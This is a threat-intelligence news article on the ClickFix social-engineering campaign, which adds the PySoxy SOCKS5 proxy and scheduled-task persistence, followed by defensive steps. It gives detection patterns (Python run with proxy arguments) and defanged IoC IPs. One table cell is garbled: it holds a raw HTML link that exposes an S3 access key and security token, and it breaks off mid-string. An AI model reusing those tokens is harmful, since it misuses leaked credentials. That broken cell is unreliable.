ClickFix uses a decade-old SOCKS5 proxy, raising security concerns
Key Takeaways The “ClickFix” attack campaign has evolved, now integrating a decade-old Python SOCKS5 proxy tool, PySoxy, to establish persistent and resilient access to compromised...
Key Takeaways
- The “ClickFix” attack campaign has evolved, now integrating a decade-old Python SOCKS5 proxy tool, PySoxy, to establish persistent and resilient access to compromised systems.
- Initial compromise still relies on social engineering to trick users into executing a PowerShell command, but the new methodology creates multiple, redundant access channels.
- Security researchers at ReliaQuest observed this enhanced technique in April 2026, noting its ability to survive even after initial outbound connections are blocked.
- The attack chain now establishes a persistent foothold through scheduled tasks and leverages PySoxy for a secondary, distinct communication pathway, making detection and remediation more challenging.
The “ClickFix” cyberattack campaign, known for leveraging social engineering to trick users into executing malicious commands, has adopted a significant new tactic. Recent analysis reveals attackers are now incorporating PySoxy, an open-source Python SOCKS5 proxy tool first released approximately ten years ago, into their operations. This integration creates a more robust and resilient intrusion method, allowing the compromise to persist even after initial security measures are enacted.
Table Of Content
What was previously considered a straightforward user error has morphed into a sophisticated, multi-layered intrusion. This evolved ClickFix technique can maintain access to a system long after security tools attempt to block its initial communication channels, fundamentally changing the threat landscape for affected organizations, as detailed in a recent report.
The Evolving Attack Chain
The attack sequence begins conventionally: a user visits a malicious or compromised website that displays a fabricated prompt, coercing them into pasting and executing a PowerShell command on their local machine. This social engineering tactic is well-documented and has been a staple in numerous prior campaigns.
However, the critical divergence in this updated ClickFix campaign occurs immediately after the initial PowerShell command executes. Instead of a single, ephemeral callback, the malicious script establishes automated, enduring access, ensuring persistence beyond the initial user interaction.
Security researchers at ReliaQuest first identified this advanced campaign in April 2026. Their findings mark the inaugural instance where ClickFix execution has been observed in conjunction with PySoxy. The analysts characterized the outcome as a “durable access chain,” emphasizing its ability to re-execute repeatedly, even when outbound connections from the compromised host were intercepted and blocked by security controls. This persistence mechanism highlights a substantial shift in the threat’s behavior and its potential impact.
ClickFix Deploys PySoxy for Resilient Access
A crucial lesson from this campaign is that simply blocking an attacker’s network connection does not equate to ending the compromise. In the incident analyzed, endpoint security measures successfully severed both of the attacker’s initial access channels. Despite this, a pre-planted scheduled task on the compromised machine continued to attempt relaunching the malicious script for several hours.
This persistence mechanism effectively transformed a singular user mistake into an ongoing, active compromise. Experts suggest that ransomware affiliates may increasingly adopt ClickFix as a primary entry vector, alongside other established access methods. The operational parallels between this new ClickFix chain and “SocGholish” intrusions, which also utilize social engineering followed by reconnaissance and proxy-based access, indicate that ClickFix is maturing into a formidable pre-ransomware delivery platform.
Once the initial PowerShell command was executed, the attackers rapidly moved to solidify their foothold. They deployed a scheduled task designed to relaunch a staged script from the C:ProgramData folder approximately every 40 minutes. This script functioned as a lightweight remote access tool (RAT), periodically polling the attacker’s command-and-control (C2) server every three seconds to receive and execute commands on the compromised host, then transmitting the results back.
Following the establishment of PowerShell-based access, the attackers proceeded with reconnaissance, utilizing built-in Windows tools to enumerate group memberships, identify domain controllers, and map other systems within the network. Only after confirming connectivity to a staging server did the attackers introduce PySoxy. They downloaded compiled Python bytecode and executed it with proxy arguments directing traffic to a distinct external IP address.
The deployment of PySoxy provided the attacker with a secondary, independent channel back into the host. This new pathway leveraged different infrastructure and exhibited distinct traffic patterns compared to the initial PowerShell C2. Consequently, even a complete shutdown of the PowerShell connection would leave this secondary access route open, demonstrating the attacker’s strategy of establishing redundant access within the environment.
What You Should Do
- Isolate Affected Hosts Immediately: Any system suspected of a ClickFix compromise should be fully isolated from the network to prevent lateral movement and further data exfiltration.
- Review Scheduled Tasks: Conduct a thorough audit of all scheduled tasks, paying close attention to any created around the time of suspicious PowerShell activity. Prioritize investigation of tasks pointing to scripts in non-standard directories like
C:ProgramData. - Monitor for Python Execution with Proxy Arguments: Implement monitoring for Python execution, especially when associated with command-line arguments such as
-ssl,-remote_ip, and-remote_port, which are indicative of PySoxy usage. - Scan for Malicious Files: Search for compiled
.pycfiles and staged scripts in unexpected locations. Ensure all components of the attack, including Python runtimes and bytecode files, are identified and removed, not just network connections. - Enhance User Training: Reinforce security awareness training to educate users about social engineering tactics, the dangers of executing unknown commands, and how to identify suspicious prompts.
- Implement Endpoint Detection and Response (EDR): Utilize EDR solutions to detect and respond to suspicious process execution, scheduled task creation, and unusual network connections that may signal a ClickFix compromise.
Indicators of Compromise (IoCs):-
| Type | Indicator | Description |
|---|---|---|
| IP Address | 185.205.211[.]217 | ClickFix Infrastructure IP report |
| IP Address | 206.206.103[.]120 | PowerShell RAT C2 <a href="https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/attachments/11146061/f3e5987e-b170-4c46-bf3b-2386f4016d3b/ClickFix-Evolves-with-10-Year-Old-Open-Source-Python-SOCKS5-Prox.pdf?AWSAccessKeyId=ASIA2F3EMEYEZOG57RMJ&Signature=JekXMFqAtlWZ3KYGJe8R0%2BVjaVo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEHsaCXVzLWVhc3QtMSJGMEQCIE4XrMI7%2FCJuQe01QbX3eVJT4TqsL%2BdaWbE1uBKx%2Fph%2BAiATS9jgcnDU3M5u6rXvpMM5POKCQJwGnsExs8lmfe6XZyrzBAhEEAEaDDY5OTc1MzMwOTcwNSIMFQx7ion%2FKqYnzbdTKtAEsz3xOVOZQ3ATtDQAUM68s9QVWFIe8bG7wBKUXYyX7s%2Fo0rtl0XlSTmzy%2Bl8Q4CecbPoUIJutvvN1ur12Pl2b9CSFiZule42c%2FSt%2BXzv56CWV457SSgexx1u%2F7L3CSV%2F7KMbWe5oI4ND1riouydc8uYfG7AgH5r1I5KNk3hK8XRjoXRo5INlymeqRlxVz6kPTsX6T9HiszlBWQIbUxi%2FH9hcNRVwLumIjEPlYmvPmFIv2HoyOR%2BLoKJpJWtaM1gpdM5H96n3LEu0TbKHAc4jdAdooc7AscF9UtlJRuSWb%2Fha25SrPySRLp6o5GjAL%2FBYN2qdNwULxJ0VyldvRQtKGA2UXkEnkODwdU0LuxIJOvxpp1o1auKDybjslqm4SadktCY1zYebRHJNT92zYmj2%2BjKWiCUVnk0Q2NxRUtWwFEvICYPLFCxest%2F9U0yUbaFjOIxSVXOs2TsHsX38vHUPI%2FGy755%2BoM5V64hwnLyQcG9flhOh0SHuLq2%2BLMQzcTemvQK%2FklcNb5zBb4NGA5U%2FhsWhAsujQZjv5mWUPccaxOrmtmlOkaSo8%2F0cKuIVK6Y7AIPkBz%2B8RgqAwef5TP7uUWsl0l9eN6JReDR11kRiQVZXkjjqoqM8O2xCPhVpCCJ4TVBeS3AuVxquuebfLLjy7Z49WI5ffXuemAulAgMkzjZNbBjFwt%2BzEcMzLdCiTVpV9Mf6Gv%2BDdWIpMJPandPqoWfQsq%2BHQRqjQBetyhreSeQA3NOKjVMGooqb%2BhGGVcihPxyk%2FwWUn4P1MCtycBj0yXTCnqJHQBjqZAaTAwXWwSG4D0O648YttDPfj16Po82vYRie0kC9qzd2
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources. |



No Comment! Be the first one.